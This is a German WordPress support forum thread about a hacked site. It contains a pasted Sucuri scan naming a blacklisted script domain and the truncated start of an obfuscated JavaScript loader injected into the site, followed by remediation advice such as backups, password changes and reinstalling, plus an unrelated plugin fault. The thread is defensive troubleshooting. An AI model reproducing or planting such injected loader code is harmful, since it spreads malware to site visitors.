Jetzt haben sich unsere Postings überschnitten.
Es gab vor kurzem ein Update der jQuery-Library, weshalb es bei nicht-aktuellen Themes und Plugins zu Fehlern kommen kann.
Sowohl Theme als auch alle Plugins müssen daher mit WP 4.5 kompatibel sein.
Die Frage ist also, ob dein Theme EVENTR mit WP 4.5 kompatibel ist, das müsstest du mal den Support von denen fragen.
Der RevSlider kommt bei diesen Themes ja im „Bundle“ mit und kann, sofern du ihn nicht separat gekauft hast, nur so aktuell sein wie das Theme.
Also stelle sicher, dass sowohl Theme und Plugins auf dem aktuellen Stand, sprich: mit WP 4.5. kompatibel sind.
Vgl. WP Master List
Updated libraries: We updated jquery, backbone, and a couple other libraries. This may cause your browsers to render oddly. Please remember to flush your cache (browser and website/server). If you’re using Cloudflare, you may need to kick it.
Vermutlich waren weder Theme noch Plugins auf dem neuesten Stand und wurden dadurch kompromittierbar.
Website: XXX.de
Status: Infected With Malware. Immediate Action is Required.
Web Trust: Not Currently Blacklisted (10 Blacklists Checked)
Scan: Malware
Result: Detected
Severity: Critical
Recommendation: Get Your Site Cleaned
ISSUE DETECTED DEFINITION INFECTED URL
Internal Server Error 500-error?error.500_internal_error.1
Internal Server Error 500-error?error.500_internal_error.1
Website Malware MW:BLK:2
Site error detected. Details: http://labs.sucuri.net/signatures/500-error?error.500_internal_error.1
HTTP/1.1 500 Internal Server Error
Site error detected. Details: http://labs.sucuri.net/signatures/500-error?error.500_internal_error.1
HTTP/1.1 500 Internal Server Error
Javascript included from a blacklisted domain. Details: http://sucuri.net/malware/entry/MW:BLK:2
Javascript: kamagrajel.biz
Hallo,
deine Seite scheint kompromittiert zu sein.
Zu einem lädt er jquery.min.php von einer nicht vertrauenswürdigen Quelle nach.
http://screencast.com/t/CgueexTd
Desweiteren liefert die Seite als letzte „seltsames“ Javasctipt
<script type='text/javascript'>(new Function(String.fromCharCode(19 - 9, 119 - 1, 102 - 5, 118 - 4, 37 - 5, 111 - 4, 103 - 2, 123 - 2, 34 - 2, 62 - 1, 38 - 6, 45 - 6, 94 - 9 ....
Status: Infected With Malware.
[…]
Javascript included from a blacklisted domain
Das klingt leider ziemlich eindeutig. 🙁
Hallo Frank,
was bedeutet das denn? Hast Du einen Rat, was ich tun kann?
(ausser ruhig zu bleiben, was mir langsam nicht mehr so recht gelingen will…)
Lieben Gruß,
Katja
Hallo Katja,
die o.g. Links beschreiben das schon ganz gut.
– Backup machen von der Datenbank und dem Dateisystem der Webseite
– Webseite abschalten damit kein Schadcode weiter ausgeliefert wird.
– Entspannt bleiben – das ist kein Angriff gegen Dich/Firma/Verein. Es geht in der Regel nur um Ressourcen wie Bandbreite, CPU, Filesytem oder möglichst Reichweite um Schadcode zu verteilen.
Da das System kompromittiert wurde, ist es vollständig als nicht vertrauenswürdig zu erachten!
Wenn ein Angreifer deine Dateien manipulieren konnte, konnte er in der Regel auch andere lesen.
Das bedeutet:
Da unklar ist was an Schadcode ausgelifert wurde (und je nach persönlicher paranoia)
– lokalen Rechner auf Schadsoftware prüfen und ggf Maßnahmen ergreifen.
Alle Kennwörter ändern
– ftp
– ssh
– Datenbank
– ggf weitere vorhandene
Ich(!) würde den Inhalt meiner Datenbank prüfen, ob die manipuliert wurde und die Dateien ( also WordPress, Themes, Plugins) neu installieren.
Auch wenn es den Anschein erweckt das nur das Theme manipuliert wurde und du das nur überschrieben musst, so hast du keine Gewehr das es wirklich so ist.
Es reicht auch nicht ein altes Backup zurück zu spielen oder die alte Version des Themes einzuspielen. Das Loch muss gestopft werden, sonst kannst du zuschauen bis die Webseite wieder „kaputt“ ist.
Frank
Hallo ihr lieben,
ich habe Seite gestern leider das gleiche Problem. Ich komme auf meine Homepage nicht mehr drauf, bzw. die Seite bleibt einfach weiß. Das hat auch zur Folge, dassich nicht auf das Dashboard gelange. Habe bei meinem Hoster angerufen und die sagten mir das gestern etwas in der wp/content Ordner verändert wurde obwohl ich keine Änderung dort vorgenommen habe. Der Fehler scheint auch bei WordPress zu liegen, denn die andere Domain die über den gleiche Hoster und Vertrag läuft funktioniert. Letzte Aktualisierungen sind schon ein paar Tage her. Wir versuchen gerade über das letzte Backup des Hosters die Seite wiederherzustellen. Falls das nicht gelingen sollte, kann mir dann jemand ein Tipp geben? Kann das ein Angriff auf meine Website gewesen sein? Vielen Dank schon mal im Voraus.
Update: Das Backup des Hosters hat kein Änderung bewirkt, die Seite bleibt nach wie vor weiß.
Es hat sich erledigt. Vielen Dank. Der Hoster hat bei mir das Plugin wp Slimstat deaktiviert welches den Fehler verursacht hat.
